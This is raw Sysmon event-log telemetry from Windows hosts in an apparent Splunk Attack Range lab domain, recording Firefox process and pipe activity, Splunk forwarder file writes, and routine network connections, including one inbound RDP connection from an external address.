Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.374.160296821C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:00:06.324{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.374.160296821C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:07.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84658BC00FB138D7C8086BD6D42BF8F0,SHA256=41B1F5557620E8461F25304996730B88430C1759CD81E8F40E05D1EC18D3DAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2283477A49C7BE8CC58E820AAC39C49,SHA256=4B887699FCF4A71AB20B29C8F873C7D59D690ADF175CC5F8E178C04E935A14DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:08.012{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDD074868A9CA0B7F48C70BB4C8EC6E3,SHA256=5E8DF8C144220CAC12EFE1C85F6DD08B13E38EDC3685028FDC0F5AB2707A78FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:09.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5D0ECC7A299CE7F2878910C1C905474,SHA256=2D114F3CA7A1B7580C9DECFDF6B35270C6F76753277692E6C80350509B7B20F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:09.027{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451DE62BDA1502DB8BE2D28763CB05C9,SHA256=32AEA86D19B93F46B33576D85BCAA7A65731920EDCB6A9011A1D41A708625D77,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.675{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51142-false10.0.1.12-8000- 23542300x80000000000000001052007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:10.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B79506813E90C6322079A8D866E32C,SHA256=CFABB85B0F850231145840160707692278B3068B655270CDB2E36A5C79D52B29,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:09.379{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:10.043{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFC7244351D0D4267F0C58FAB3EB3F6,SHA256=F5E1CBA9A2F56908ED175B48F53D63FF705B417F31025D711B3BCA287F359331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:11.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911008B6B8230E3A2241B0D67D031DDC,SHA256=54770EE4A85E895A517639E2E7A464830507C3593A9737D9923711BCF19057B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:11.074{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3690042BB68F4769521B03BA6B5EAED,SHA256=03D3001EBFA820997E1FF703DD4B5C54B4EE7C57F54FE6465402B320F26DCB10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AAA955762039F980CDF10C5DF97C90,SHA256=7197D0B1DEA3B6400A52BC5E7DEA943AF29369E4514BF849F2C8DC52A2A42119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:12.121{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CBB48C76964C3D13BC927C10A4B4E0,SHA256=64E06FA2823334258599B27DAA42DE302118DD6348253EFB96392A8D78A9ED45,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.420{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001052009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.420{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=A46594CAB1E06DBA640EA339E282546B,SHA256=67CBC2A8958F6B86D2D897756135966143B6B46A374E53F59B9319DA5AC55F19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:13.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEBC1B32636EFC5E3AF50B2880EE7C39,SHA256=3DF509D8AF376E2160A3EFBF1ED0B1290C45F080542D8EF37CAD6C869E8D5CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:13.199{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31BC499CF9A892E63D0D6E04E50121C0,SHA256=84C563E860CF7212D35D23A347B315452BAF29D5414841E345BC332BBC600852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:14.833{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC22514186EE1BB401870AD4499B34CF,SHA256=7EAA7949827F34FD5AEE7125F89532266AA13EB512E0709BA02057CEE02B3A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:14.246{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB61982D79A1D49D981EA52DC2766D1F,SHA256=90E90A8DC200038059F2A851AD936D1FDF4008137077F46E753A10289261B024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.850{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483C84A3FA991E7471E9BCDF13DF6693,SHA256=138E89F0198E2D1E3D0152EB58FCED0277495DC4C66530185F2903ACBAA9FBD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:15.290{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243B422B6A2C18D68703EA9BCE08E234,SHA256=9C5DBB0E34A4F966FB346E9764E62807FFDBD9A553E4E402E236DEDB9AA197DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8DEAA4DD6676A1438A4C4E02F64462E,SHA256=AB2F7064D4858C91C72FFC8247304BC178E67DE3C67A538C936C37DC32636609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D785BE59207A68343C99C24550667EF,SHA256=A99372636DCF85E0F387EA27F09CE8D2D132CBD95CE30E95608DB98E737AA93F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.010{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51144-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.010{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51144-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:07.631{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51143-false10.0.1.12-8000- 23542300x80000000000000001052026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:16.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA7DAC2E703DAD14EE1F8BB17C2DB1C,SHA256=623EC6399C2CCC43EE4AF9B8B60CE16258BAD28B2B7EBE058D72CA5E26DB000A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:15.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:16.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=189ABE742354A7FD75C4E47C14CB9353,SHA256=22D6315839AE99DF4B54AFA9B74C9A52247979CFD0909184EB881EAB0144E630,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001052025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53365- 354300x80000000000000001052024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local57677- 354300x80000000000000001052023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53248- 354300x80000000000000001052022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.733{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63533- 354300x80000000000000001052021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.731{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59964- 354300x80000000000000001052020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.731{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59988- 
23542300x80000000000000001052027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:17.866{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81465426CF853300D548DE2EF890EEBA,SHA256=BFFC7AAA96D7BD032345FD9C9B0311DAFA7EC1F24EE9EC31F4F5D9D9BBCB8E4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:17.337{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF5EF214E8CF4FA46E77F3425ACE35A3,SHA256=6A2C4252403A43C77E8E50CFE1D43DB610989B24CB5ED41F4F5C5D1D2C3B7C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.883{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970AD574099F350E8085CE52814F75EF,SHA256=47F9CAC9B85DCF71E2A5A73C2BB0DF57D651D1DF8789C94A8767B8DC4B5CE0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:18.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B74B9FDD9D8E6290BE614A346DA810A3,SHA256=4E73E11545D57B5809A85F58A8FDD66A85AA6C2FB2222DEC25FB05549A1E66B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.483{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:19.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6581A8BBE17944C5576298846DA2C8D2,SHA256=9C1E933F38D0F0DDA749BB4163E48ADD4FFD8D10D4F231F151B3D8FB163A49E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:19.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676FAEF6BDE9D9D095FA0C6646149335,SHA256=52BE6898E3C584B8BA5BABCE3B3729DC0EFEA618CDA8C67C82956D10C38C4E74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:20.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B107C3B6812334B2F18C84B686D85BFC,SHA256=B5840B861D953389F9617EC9A6A57C7FEB2DE16A2D337F3F9E7DD4229FE89623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.697{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2185CACFC64A75DB89E4A43546061E2,SHA256=0317B546F9F42E7491B7DCC656485CAA00CD1F5B93FC946883FE322B2673DB98,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51145-false10.0.1.12-8000- 23542300x80000000000000001052034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:21.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33197E1F11DBB9042299ADE4DA49505,SHA256=C03EF019461AC2C1D015247FBF28A690650CC9D6C0561CE579D93BC1005C9689,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.829{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57368-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:21.415{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7BA075B10533841AD8C90637FE1890,SHA256=35F74F7C4754552D3D62B8A4879E309AF0190F2E7C9B47AE457E4138AE940F8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:13.031{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse194.156.88.187chabka-hosting.com58022-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001052035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:22.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD15BE3E0D48CA0B5272A31B8908FA07,SHA256=0A190A8D19EB54C1CEB245A75EFB9ECB1F8C7A4A26EC21CC56EF0A53E68572AB,IMPHASH=00000000000000000000000000000000falsetrue 
